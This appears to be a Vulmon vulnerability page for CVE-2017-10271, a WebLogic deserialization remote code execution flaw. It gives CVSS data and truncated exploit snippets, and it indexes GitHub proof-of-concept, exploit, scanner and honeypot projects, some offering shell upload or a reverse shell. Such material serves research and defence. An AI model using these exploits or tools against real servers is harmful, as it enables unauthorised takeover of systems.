Published: 19/10/2017 Updated: 03/10/2019

CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10

CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9

VMScore: 527

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Vulnerable Product	Search on Vulmon	Subscribe to Product
oracle weblogic server 10.3.6.0.0
oracle weblogic server 12.2.1.1.0
oracle weblogic server 12.1.3.0.0
oracle weblogic server 12.2.1.2.0

The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability Supported versions that are affected are 103600, 121300, 122110 and 122120 ...

import requests import sys url_in = sysargv[1] payload_url = url_in + "/wls-wsat/CoordinatorPortType" payload_header = {'content-type': 'text/xml'} def payload_command (command_in): html_escape_table = { "&": "&", '"': """, "'": "&apos;", ">": ">", "<": "<", } command_f ...

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient # include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( u ...

#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: Weblogic wls-wsat Component Deserialization RCE # Date Authored: Jan 3, 2018 # Date Announced: 10/19/2017 # Exploit Author: Kevin Kirsche (d3c3pt10n) # Exploit Github: githubcom/kkirsche/CVE-2017-10271 # Exploit is based off of POC by Luffin from Github # github ...

weblogic 漏洞扫描工具

weblogic-scan weblogic 漏洞扫描工具妄想试图weblogic一把梭目前检测的功能 console 页面探测 & 弱口令扫描 uuid页面的SSRF CVE-2017-10271 wls-wsat页面的反序列化 CVE-2018-2628 反序列化 CNVD-C-2019-48814 后期可以的话还会继续加功能的，主要是一些反序列化的poc真的不好写，我也不咋会 USE 使用

WebLogic CNVD-C-2019_48814 CVE-2017-10271

WebLogic_CNVD_C_2019_48814 WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm

WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware. This is a Remote Code Execution vulnerability.

WebLogic honeypot Cymmetria Research, 2018 wwwcymmetriacom/ Written by: Omer Cohen (@omercnet) Special thanks: Imri Goldberg (@lorgandon), Itamar Sher, Nadav Lev Contact: research@cymmetriacom WebLogic Honeypot is a low interaction honeypot to detect CVE-2017-10271 in the Oracle WebLogic Server component of Oracle Fusion Middleware This is a Remote Code Execution v

针对类似CVE-2017-10271漏洞的一个java反序列化漏洞扫描器

java反序列化漏洞检测针对类似CVE-2017-10271漏洞的一个java反序列化漏洞扫描器，此项目中只有一个poc，其他暂时未做整理。安装安装nmap nmaporg/downloadhtml 根据操作系统的不同，下载不同的版本安装。安装第三方包 pip install -r requirementstxt 扫描修改poc，将ping命令中的ip地址�

zscan的poc扫描模块，独立出来是为了方便以后升级xray poc格式的v2版本

zscan-poc-check 暂时兼容xray v1版本的poc，根据实际使用需求看是否需要升级到v2 参考 githubcom/shadow1ng/fscan githubcom/jjf012/gopoc 简单使用查看所有内置poc /zscan_poc_check -list 查看指定内置poc /zscan_poc_check -list -name weblogi

记录我的2021年

AD 2021 记录下我的2021年。(Inspired by yihong) Github 收藏的博客序号博客备注 1 jimmysongio 云原生技术学习 2 githubcom/Maskhe/javasec Java 安全学习 3 土豆不好吃好多有趣的东西，极客风 4 safe6 safe6 师傅，web安全，安卓逆向 5 phith0n p牛！ 6 whoami whoami, web， ctfer 7 素18 su18 8 4ra1n

Weblogic Upload Vuln(Need username password)-CVE-2019-2618

cve-2019-2618 Weblogic Upload Vuln(Need username password)-CVE-2019-2618 python使用 python CVE-2019-2618py url username password 解密weblogic密码 root@f0cb7e674d7e:~/Oracle# cat /root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/security/bootproperties |grep pass password={AES}dv/eNBsyg5GcDUbAKaQRhe

CVE-2017-10271 Usage: CVE-2017-12149py targetip:port/ WEBLOGIC RCE Work with windows only, you could edit code a bit for linux

CNVD-C-2019-48814 poc work on linux and windows

CNVD-C-2019-48814 work on linux and windows(CVE-2019-2725) WebLogic wls9-async反序列化远程命令执行漏漏洞说明 It's does't work when weblogic patched for cve-2017-10271 10360 12130 基于jas502n的脚本修改而成使用 python async_command_favicon_allpy 127001:7001 漏洞复现 1 Windows Server 2012 servers/AdminServer/tmp/_

CVE-2019-2725poc汇总更新绕过CVE-2017-10271补丁POC

CNVD-C-2019-48814和CNNVD-201904-961 感谢t00ls-ximcx0101提供脚本 CNVD-C-2019-48814 POC Summary 相关链接如下: 清水川崎大佬的简书: wwwjianshucom/p/c4982a845f55 安全祖师爷转发: dwzcn/2GQvbUae 由于环境的一些因素路径会存在变化: 默认上传路径为: servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war

WebLogic wls9-async反序列化远程命令执行漏洞

CNVD-C-2019-48814 WebLogic wls9-async反序列化远程命令执行漏洞回显poc for weblogic Patch update: wwworaclecom/technetwork/security-advisory/alert-cve-2019-2725-5466295html 漏洞复现： 101020166:7001/_async/AsyncResponseService curl -i 101020166:70

Awesome Honeypots A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects There is no pre-established order of items in each category, the order is for contribution If you want to contribute, please read the guide Discover more awesome lists at sindre

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271 Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection and Exploitation Script Usage $ python CVE-2017-10271py -l 10101010 -p 4444 -r willbepwnedcom:7001/ Features Standalone Python script Check functionality to see if any host is vulnerable Exploit functionality for Linux targets

WebLogic Exploit

CVE-2017-10271 identification and exploitation Unauthenticated Weblogic RCE nvdnistgov/vuln/detail/CVE-2017-10271 wwworaclecom/technetwork/topics/security/cpuoct2017-3236626html POST /wls-wsat/CoordinatorPortType HTTP/11 Host: SOMEHOSTHERE Content-Length: 1226 content-type: text/xml Accept-Encoding: gzip, deflate, compress Accept: */* User-Agent: python-

POC for CVE-2017-10271. Since java.lang.ProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload. Added java.lang.Runtime and will add others in the future. This is for educational purposes only: I take no responsibility for how you use this code.

Weblogic_Wsat_RCE POC for CVE-2017-10271 Since javalangProcessBuilder was the original vector for RCE, there are multiple signature based rules that block this particular payload Added javalangRuntime and will add others in the future This is for educational purposes only: I take no responsibility for how you use this code

(CVE-2017-10271)Java反序列化漏洞

-CVE-2017-10271- (CVE-2017-10271)Java反序列化漏洞 Java反序列化漏洞利用工具V10 Java反序列化相关漏洞的检查工具，采用JDK 18版本开发，软件允许必须安装JDK 18或者以上版本。

CVE-2017-10352 CVE-2017-10271 weblogic-XMLDecoder

本软件仅限用于学习交流禁止用于任何非法行为 #Weblogic-XMLDecoder-GUI CVE-2017-10352 基于python GUI 实验作品主要功能针对对weblogic XMLDecoder 造成的反序列化漏洞的利用，开发目的熟悉python tkinter 类库以及ttk扩展的使用稍后会封装为windows下可执行文件主要针对的漏洞为CVE-2017-10271 CVE-2017-10352，�

weblogic XMLDecoder反序列化漏洞利用工具

XMLDecoder_unser weblogic XMLDecoder反序列化漏洞利用工具主要针对漏洞CVE-2017-3506和CVE-2017-10271

WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm

7kbscan-WebLogic_CNVD_C_2019_48814 WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm

CVE-2017-10271 Usage: python CVE-2017-10271py url

python3 POC for CVE-2019-2729 WebLogic Deserialization Vulnerability and CVE-2017-10271 amongst others

weblogic-CVE-2019-2729-POC python3 POC for CVE-2019-2729 WebLogic Deserialization Vulnerability and CVE-2017-10271 amongst others

CVE-2017-10271

CVE-2017-10271 CVE-2017-10271 命令执行并回显直接上传shell 在linux下weblogic 10360测试OK 使用方法及参数 python weblogic_wls_wsat_exppy -t IP:7001 usage: weblogic_wls_wsat_exppy [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET

Oracle-WebLogic-CVE-2017-10271

WebLogic Wls-wsat XMLDecoder 漏洞描述 mitre:cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2017-3506 早期，黑客利用WebLogic WLS 组件漏洞对企业服务器发起大范围远程攻击，有大量企业的服务器被攻陷，且被攻击企业数量呈现明显上升趋势，需要引起高度重视。其中，CVE-2017-3506是一个利用Oracle WebLogic中WLS �

forked from https://github.com/s3xy/CVE-2017-10271. Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HT…

weblogic_wls_wsat_rce Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本，参考githubcom/s3xy/CVE-2017-10271修改。命令执行并回显直接上传shell 在linux下weblogic 10360测试OK 使用方法及参数 python weblogic_wls_wsat_exppy -t 1721680131:7001 usage: weblogic_wls_wsat_exppy [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHE

cve-2017-10271 POC

CVE-2017-10271 POC Introduction This is an autotest poc for CVE-2017-10271 Having been tested on CentOS 7 and Windows 7/10 Building This project is written in rust language You need to install rust environment from wwwrust-langorg/ first and then build the project with the following code $ cargo build --release Then you can g

Weblogic XMLDecoder系列漏洞POC

Weblogic-XMLDecoder-POC Weblogic XMLDecoder系列漏洞POC 漏洞版本 CVE-2017-3506 CVE-2017-10271 CVE-2019-2725 CVE-2017-3506 项目中poc/2017-3506目录下存了两个poc： poc1xml : 执行命令，在/tmp目录下生成diggid文件，需要进docker里面验证 poc2xml : 反弹shell，需要外连 CVE-2017-10271 同3506 CVE-2019-2725 项目中poc/2019-2725目录�

WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit

CVE-2019-2725 WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit Info / Help $ python3 weblogic_exploitpy -h ======================================================================== | WebLogic Universal Exploit | | CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2

一款集漏洞探测、攻击，Session会话，蜜罐识别等功能于一身的软件，基于go-micro微服务框架并对外提供统一HTTP API网关接口服务

gofor 一款集漏洞探测、攻击，Session会话，蜜罐识别等功能于一身的软件，基于go-micro微服务框架并对外提供统一HTTP API网关接口服务 HTTP API Gateway /api-srv Service Install(Optional) Exploit /srv-exploit Webshell /srv-webshell

CVE-2017-10271 WEBLOGIC RCE (TESTED)

CVE-2017-10271 Usage: CVE-2017-12149py targetip:port/ WEBLOGIC RCE Work with windows only, you could edit code a bit for linux

cve-2017-10271

weblogic_wls-wsat_component_deserialisation_rce_cve-2017-10271 poc&exp exp only works while the path is exist can works for single or multiple ==just for learn==

CVE-2019-2725poc汇总更新绕过CVE-2017-10271补丁POC

Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)

CVE-2017-10271 POC

CVE-2017-10271 Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)检测脚本用法 $ python CVE-2017-10271 url 另外需要注册一个ceyeio的账号，将其提供的Identifier及API Token填入代码的如下部分：功能检测Windows及Linux环境下Weblogic是否存在CVE-2017-10271的远程命令执行漏洞目前�

CVE-2017-10271 Weblogic 漏洞验证Poc及补丁

CVE-2017-10271 CVE-2017-10271 Weblogic 漏洞验证Poc Useage: python weblogicpy -u '****:7001/wls-wsat/CoordinatorPortType' -c 'touch /tmp/test'  点我下载补丁

Simplified PoC for Weblogic-CVE-2017-10271

PoCs-Weblogic_2017_10271 Simplified PoC for Weblogic-CVE-2017-10271

look for weblogic wsat RCE from list

weblogic-wsat-scan look for weblogic wsat RCE from list based on githubcom/c0mmand3rOpSec/CVE-2017-10271/blob/master/scannersh ref: githubcom/c0mmand3rOpSec/CVE-2017-10271

cve-2017-10271

CVE-2017-10271 This is part of Cved: a tool to manage vulnerable docker containers Cved: githubcom/git-rep-src/cved Image source: githubcom/cved-sources/cve-2017-10271 Image author: githubcom/henryzzq/ubuntu_weblogic1036_domain/tree/master/ubuntu/weblogic1036_domain

Beapy: Cryptojacking Worm Hits Enterprises in China

Symantec Threat Intelligence Blog • Security Response Attack Investigation Team • 24 Apr 2024

Cryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.

Posted: 24 Apr, 20196 Min ReadThreat Intelligence SubscribeFollowtwitterfacebooklinkedinBeapy: Cryptojacking Worm Hits Enterprises in ChinaCryptojacking campaign we have dubbed Beapy is exploiting the EternalBlue exploit and primarily impacting enterprises in China.Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks. Beapy act...

IT threat evolution Q3 2022

Securelist • David Emm • 18 Nov 2022

IT threat evolution in Q3 2022 IT threat evolution in Q3 2022. Non-mobile statistics IT threat evolution in Q3 2022. Mobile statistics Targeted attacks CosmicStrand: discovery of a sophisticated UEFI rootkit In July, we reported a rootkit that we found in modified Unified Extensible Firmware Interface (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating syste...

Securelist • Kurt Baumgartner • 09 Aug 2022

On July 7, 2022, the CISA published an alert, entitled, “North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector,” related to a Stairwell report, “Maui Ransomware.” Later, the Department of Justice announced that they had effectively clawed back $500,000 in ransom payments to the group, partly thanks to new legislation. We can confirm a Maui ransomware incident in 2022, and add some incident and attribution findings. We extend their...

Securelist • David Emm • 04 Dec 2019

What were the most interesting developments in terms of APT activity during the year and what can we learn from them? This is not an easy question to answer, because researchers have only partial visibility and it´s impossible to fully understand the motivation for some attacks or the developments behind them. However, let´s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective. Targeting supply c...

APT trends report Q3 2019

Securelist • GReAT • 16 Oct 2019

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of. This is our latest installment, focusin...

Get Started

CVE-2017-10271

Vulnerability Summary

Vulnerability Trend

Exploits

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect